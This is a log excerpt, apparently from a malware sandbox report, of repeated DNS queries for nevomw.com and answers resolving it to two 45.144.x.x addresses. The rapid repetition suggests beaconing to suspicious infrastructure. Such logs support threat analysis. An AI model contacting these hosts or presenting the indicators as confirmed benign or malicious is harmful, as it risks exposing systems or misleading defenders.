                                            Dec 2, 2020 11:54:19.151036978 CET192.168.2.68.8.8.80x9689Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:19.527997017 CET192.168.2.68.8.8.80x5042Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:19.926543951 CET192.168.2.68.8.8.80x8aa6Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:20.382962942 CET192.168.2.68.8.8.80x3008Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:20.773883104 CET192.168.2.68.8.8.80xd77Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:21.157676935 CET192.168.2.68.8.8.80x3028Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:21.525206089 CET192.168.2.68.8.8.80xd69eStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:21.906178951 CET192.168.2.68.8.8.80xbebaStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:22.302553892 CET192.168.2.68.8.8.80x25d0Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:22.729923010 CET192.168.2.68.8.8.80x5cf9Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:23.100929022 CET192.168.2.68.8.8.80x7f4aStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:23.510452986 CET192.168.2.68.8.8.80x9134Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:23.916831970 CET192.168.2.68.8.8.80xacccStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:24.330015898 CET192.168.2.68.8.8.80xf771Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:24.777729988 CET192.168.2.68.8.8.80xa872Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:25.196018934 CET192.168.2.68.8.8.80xb823Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:25.633527994 CET192.168.2.68.8.8.80xa121Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:26.057401896 CET192.168.2.68.8.8.80xb601Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:26.484194040 CET192.168.2.68.8.8.80x76f6Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:26.873094082 CET192.168.2.68.8.8.80xa9acStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:27.340032101 CET192.168.2.68.8.8.80x59c9Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:27.751902103 CET192.168.2.68.8.8.80x9e66Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:28.121882915 CET192.168.2.68.8.8.80x6318Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:28.559003115 CET192.168.2.68.8.8.80x7812Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:29.007213116 CET192.168.2.68.8.8.80x7170Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:29.390543938 CET192.168.2.68.8.8.80x7969Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:29.797132969 CET192.168.2.68.8.8.80x5a3Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:30.181869030 CET192.168.2.68.8.8.80xf272Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:30.601612091 CET192.168.2.68.8.8.80x90b1Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:30.985236883 CET192.168.2.68.8.8.80xaf48Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:31.439317942 CET192.168.2.68.8.8.80xa31bStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:31.882524014 CET192.168.2.68.8.8.80xc14fStandard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:32.338794947 CET192.168.2.68.8.8.80x2755Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:32.798295021 CET192.168.2.68.8.8.80xc279Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:33.233997107 CET192.168.2.68.8.8.80xc462Standard query (0)nevomw.comA (IP address)IN (0x0001)
                                            Dec 2, 2020 11:54:33.669555902 CET192.168.2.68.8.8.80x438aStandard query (0)nevomw.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Dec 2, 2020 11:52:41.355474949 CET8.8.8.8192.168.2.60x1c2aNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:41.355474949 CET8.8.8.8192.168.2.60x1c2aNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:41.803246975 CET8.8.8.8192.168.2.60xf17aNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:41.803246975 CET8.8.8.8192.168.2.60xf17aNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:42.132451057 CET8.8.8.8192.168.2.60x597No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:42.132451057 CET8.8.8.8192.168.2.60x597No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:42.606357098 CET8.8.8.8192.168.2.60xb42cNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:42.606357098 CET8.8.8.8192.168.2.60xb42cNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:43.162781000 CET8.8.8.8192.168.2.60x5e0bNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:43.162781000 CET8.8.8.8192.168.2.60x5e0bNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:43.713635921 CET8.8.8.8192.168.2.60xd940No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:43.713635921 CET8.8.8.8192.168.2.60xd940No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:44.310158968 CET8.8.8.8192.168.2.60x377cNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:44.310158968 CET8.8.8.8192.168.2.60x377cNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:44.752568007 CET8.8.8.8192.168.2.60x2af8No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:44.752568007 CET8.8.8.8192.168.2.60x2af8No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:45.611747026 CET8.8.8.8192.168.2.60x74b6No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:45.611747026 CET8.8.8.8192.168.2.60x74b6No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:46.116872072 CET8.8.8.8192.168.2.60xf5b6No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:46.116872072 CET8.8.8.8192.168.2.60xf5b6No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:47.122234106 CET8.8.8.8192.168.2.60x6d5aNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:47.122234106 CET8.8.8.8192.168.2.60x6d5aNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:47.561136961 CET8.8.8.8192.168.2.60x42cdNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:47.561136961 CET8.8.8.8192.168.2.60x42cdNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:47.991945982 CET8.8.8.8192.168.2.60xa47cNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:47.991945982 CET8.8.8.8192.168.2.60xa47cNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:48.418570042 CET8.8.8.8192.168.2.60xc78bNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:48.418570042 CET8.8.8.8192.168.2.60xc78bNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:48.822575092 CET8.8.8.8192.168.2.60x73abNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:48.822575092 CET8.8.8.8192.168.2.60x73abNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:49.230813026 CET8.8.8.8192.168.2.60x559cNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:49.230813026 CET8.8.8.8192.168.2.60x559cNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:49.694818020 CET8.8.8.8192.168.2.60x5065No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:49.694818020 CET8.8.8.8192.168.2.60x5065No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:50.129313946 CET8.8.8.8192.168.2.60x33c8No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:50.129313946 CET8.8.8.8192.168.2.60x33c8No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:50.570329905 CET8.8.8.8192.168.2.60x27ddNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:50.570329905 CET8.8.8.8192.168.2.60x27ddNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:51.013034105 CET8.8.8.8192.168.2.60x19b1No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:51.013034105 CET8.8.8.8192.168.2.60x19b1No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:51.431253910 CET8.8.8.8192.168.2.60x942bNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:51.431253910 CET8.8.8.8192.168.2.60x942bNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:51.927218914 CET8.8.8.8192.168.2.60x6e91No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:51.927218914 CET8.8.8.8192.168.2.60x6e91No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:52.426688910 CET8.8.8.8192.168.2.60xc7adNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:52.426688910 CET8.8.8.8192.168.2.60xc7adNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:52.823009968 CET8.8.8.8192.168.2.60x7f49No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:52.823009968 CET8.8.8.8192.168.2.60x7f49No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:53.268198013 CET8.8.8.8192.168.2.60xca0No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:53.268198013 CET8.8.8.8192.168.2.60xca0No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:53.721225977 CET8.8.8.8192.168.2.60x8644No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:53.721225977 CET8.8.8.8192.168.2.60x8644No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:54.120260954 CET8.8.8.8192.168.2.60x492cNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:54.120260954 CET8.8.8.8192.168.2.60x492cNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:54.600783110 CET8.8.8.8192.168.2.60xe04aNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:54.600783110 CET8.8.8.8192.168.2.60xe04aNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:55.046402931 CET8.8.8.8192.168.2.60xfb94No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:55.046402931 CET8.8.8.8192.168.2.60xfb94No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:55.442281961 CET8.8.8.8192.168.2.60xb63aNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:55.442281961 CET8.8.8.8192.168.2.60xb63aNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:55.909446955 CET8.8.8.8192.168.2.60x517No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:55.909446955 CET8.8.8.8192.168.2.60x517No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:56.431663990 CET8.8.8.8192.168.2.60x8eeeNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:56.431663990 CET8.8.8.8192.168.2.60x8eeeNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:56.798049927 CET8.8.8.8192.168.2.60x5753No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:56.798049927 CET8.8.8.8192.168.2.60x5753No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:57.196469069 CET8.8.8.8192.168.2.60x222cNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:57.196469069 CET8.8.8.8192.168.2.60x222cNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:57.684812069 CET8.8.8.8192.168.2.60x1643No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:57.684812069 CET8.8.8.8192.168.2.60x1643No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:58.062277079 CET8.8.8.8192.168.2.60x4cfbNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:58.062277079 CET8.8.8.8192.168.2.60x4cfbNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:58.515727043 CET8.8.8.8192.168.2.60xe14cNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:58.515727043 CET8.8.8.8192.168.2.60xe14cNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:58.907005072 CET8.8.8.8192.168.2.60x1d80No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:58.907005072 CET8.8.8.8192.168.2.60x1d80No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:59.302881002 CET8.8.8.8192.168.2.60xec8dNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:59.302881002 CET8.8.8.8192.168.2.60xec8dNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:59.713706970 CET8.8.8.8192.168.2.60xa247No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:52:59.713706970 CET8.8.8.8192.168.2.60xa247No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:00.193737030 CET8.8.8.8192.168.2.60x849fNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:00.193737030 CET8.8.8.8192.168.2.60x849fNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:00.585374117 CET8.8.8.8192.168.2.60xd9e7No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:00.585374117 CET8.8.8.8192.168.2.60xd9e7No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:00.989985943 CET8.8.8.8192.168.2.60xd1a0No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:00.989985943 CET8.8.8.8192.168.2.60xd1a0No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:01.478122950 CET8.8.8.8192.168.2.60xa8eNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:01.478122950 CET8.8.8.8192.168.2.60xa8eNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:01.946038008 CET8.8.8.8192.168.2.60xc733No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:01.946038008 CET8.8.8.8192.168.2.60xc733No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:02.313791037 CET8.8.8.8192.168.2.60x7c06No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:02.313791037 CET8.8.8.8192.168.2.60x7c06No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:02.905879974 CET8.8.8.8192.168.2.60x14e8No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:02.905879974 CET8.8.8.8192.168.2.60x14e8No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:03.335556984 CET8.8.8.8192.168.2.60x4814No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:03.335556984 CET8.8.8.8192.168.2.60x4814No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:04.140631914 CET8.8.8.8192.168.2.60xeedaNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:04.140631914 CET8.8.8.8192.168.2.60xeedaNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:05.283634901 CET8.8.8.8192.168.2.60xe9c5No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:05.283634901 CET8.8.8.8192.168.2.60xe9c5No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:05.682204008 CET8.8.8.8192.168.2.60x6d9fNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:05.682204008 CET8.8.8.8192.168.2.60x6d9fNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:06.049491882 CET8.8.8.8192.168.2.60xa6d0No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:06.049491882 CET8.8.8.8192.168.2.60xa6d0No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:06.496139050 CET8.8.8.8192.168.2.60x8c0cNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:06.496139050 CET8.8.8.8192.168.2.60x8c0cNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:06.926450968 CET8.8.8.8192.168.2.60xb320No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:06.926450968 CET8.8.8.8192.168.2.60xb320No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:07.309964895 CET8.8.8.8192.168.2.60xe178No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:07.309964895 CET8.8.8.8192.168.2.60xe178No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:07.784583092 CET8.8.8.8192.168.2.60x82e7No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:07.784583092 CET8.8.8.8192.168.2.60x82e7No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:10.121442080 CET8.8.8.8192.168.2.60xf1edNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:10.121442080 CET8.8.8.8192.168.2.60xf1edNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:10.508510113 CET8.8.8.8192.168.2.60x886eNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:10.508510113 CET8.8.8.8192.168.2.60x886eNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:10.966033936 CET8.8.8.8192.168.2.60x2363No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:10.966033936 CET8.8.8.8192.168.2.60x2363No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:11.392880917 CET8.8.8.8192.168.2.60xa1bNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:11.392880917 CET8.8.8.8192.168.2.60xa1bNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:11.883450985 CET8.8.8.8192.168.2.60xf955No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:11.883450985 CET8.8.8.8192.168.2.60xf955No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:12.324453115 CET8.8.8.8192.168.2.60x2df6No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:12.324453115 CET8.8.8.8192.168.2.60x2df6No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:12.711486101 CET8.8.8.8192.168.2.60x73eeNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:12.711486101 CET8.8.8.8192.168.2.60x73eeNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:13.194992065 CET8.8.8.8192.168.2.60x9cdcNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:13.194992065 CET8.8.8.8192.168.2.60x9cdcNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:13.630021095 CET8.8.8.8192.168.2.60x2134No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:13.630021095 CET8.8.8.8192.168.2.60x2134No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:14.055421114 CET8.8.8.8192.168.2.60x49d1No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:14.055421114 CET8.8.8.8192.168.2.60x49d1No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:14.445549011 CET8.8.8.8192.168.2.60x2017No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:14.445549011 CET8.8.8.8192.168.2.60x2017No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:14.859060049 CET8.8.8.8192.168.2.60x3baaNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:14.859060049 CET8.8.8.8192.168.2.60x3baaNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:15.320094109 CET8.8.8.8192.168.2.60xe4e5No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:15.320094109 CET8.8.8.8192.168.2.60xe4e5No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:15.703068018 CET8.8.8.8192.168.2.60x31d0No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:15.703068018 CET8.8.8.8192.168.2.60x31d0No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:16.066318989 CET8.8.8.8192.168.2.60x7094No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:16.066318989 CET8.8.8.8192.168.2.60x7094No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:16.439069986 CET8.8.8.8192.168.2.60xfbc6No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:16.439069986 CET8.8.8.8192.168.2.60xfbc6No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:16.807925940 CET8.8.8.8192.168.2.60x7453No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:16.807925940 CET8.8.8.8192.168.2.60x7453No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:17.187235117 CET8.8.8.8192.168.2.60x4184No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:17.187235117 CET8.8.8.8192.168.2.60x4184No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:17.555629969 CET8.8.8.8192.168.2.60xe1eNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:17.555629969 CET8.8.8.8192.168.2.60xe1eNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:17.992027998 CET8.8.8.8192.168.2.60x986bNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:17.992027998 CET8.8.8.8192.168.2.60x986bNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:18.363548040 CET8.8.8.8192.168.2.60x6920No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:18.363548040 CET8.8.8.8192.168.2.60x6920No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:18.737206936 CET8.8.8.8192.168.2.60x4b5No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:18.737206936 CET8.8.8.8192.168.2.60x4b5No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:19.261743069 CET8.8.8.8192.168.2.60xfce1No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:19.261743069 CET8.8.8.8192.168.2.60xfce1No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:19.654512882 CET8.8.8.8192.168.2.60x2f7No error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:19.654512882 CET8.8.8.8192.168.2.60x2f7No error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:19.915107965 CET8.8.8.8192.168.2.60x5b32No error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                            Dec 2, 2020 11:53:20.166687965 CET8.8.8.8192.168.2.60x769fNo error (0)nevomw.com45.144.3.234A (IP address)IN (0x0001)
                                            Dec 2, 2020 11:53:20.166687965 CET8.8.8.8192.168.2.60x769fNo error (0)nevomw.com45.144.2.145A (IP address)IN (0x0001)
